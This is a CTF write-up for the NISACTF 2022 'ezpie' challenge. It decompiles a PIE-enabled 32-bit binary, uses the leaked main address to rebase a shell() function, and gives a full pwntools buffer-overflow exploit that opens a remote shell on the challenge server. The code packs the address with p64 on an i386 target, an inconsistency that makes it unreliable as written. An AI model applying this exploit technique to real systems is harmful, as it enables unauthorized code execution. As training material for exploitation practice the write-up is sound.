NISACTF 2022 ezpie

[NISACTF2022]ezpie

• checksec

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

OHHH!,give you a gift!
0x56573770
Input:

• main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  puts("OHHH!,give you a gift!");
  printf("%p\n", main);
  puts("Input:");
  vuln();
  return 0;
}

• vuln

ssize_t vuln()
{
  char buf; // [esp+0h] [ebp-28h]

  return read(0, &buf, 0x50u);
}

vuln()有溢出

已知程序会输出main地址

程序main函数地址为00000770，则

main_addr = int(io.recvline(),16)
offset = main_addr - main_add

接收程序输出的main函数地址，减去静态地址算出offset

• shell

int shell()
{
  return system("/bin/sh");
}

获取shell地址

bin_sh = elf.sym['shell']

加上offset，得bin_sh_final

bin_sh_final = offset + bin_sh

完整exp

from pwn import *
context(os = 'linux' , arch = 'i386' , log_level = 'debug')
content = 0
if content == 0:
    io = remote('124.221.24.137',28638)
else:
    io = process('')
def atk():
    elf = ELF('')
    padlength = 0x28 +0x4
    bin_sh = elf.sym['shell']
    io.recvuntil('OHHH!,give you a gift!\n')
    main_addr = int(io.recvline(),16)
    success('[+]main_addr=' + hex(main_addr))
    main_add = elf.sym['main']
    offset = main_addr - main_add
    success('[+]offset=' + hex(offset))
    io.recvuntil('Input:\n')
    success('[+]bin_sh=' + hex(bin_sh))
    bin_sh_final = offset + bin_sh
    success('[+]bin_sh_final='+hex(bin_sh_final))
    payload = b'a' * padlength + p64(bin_sh_final)
    io.sendline(payload)
    io.interactive()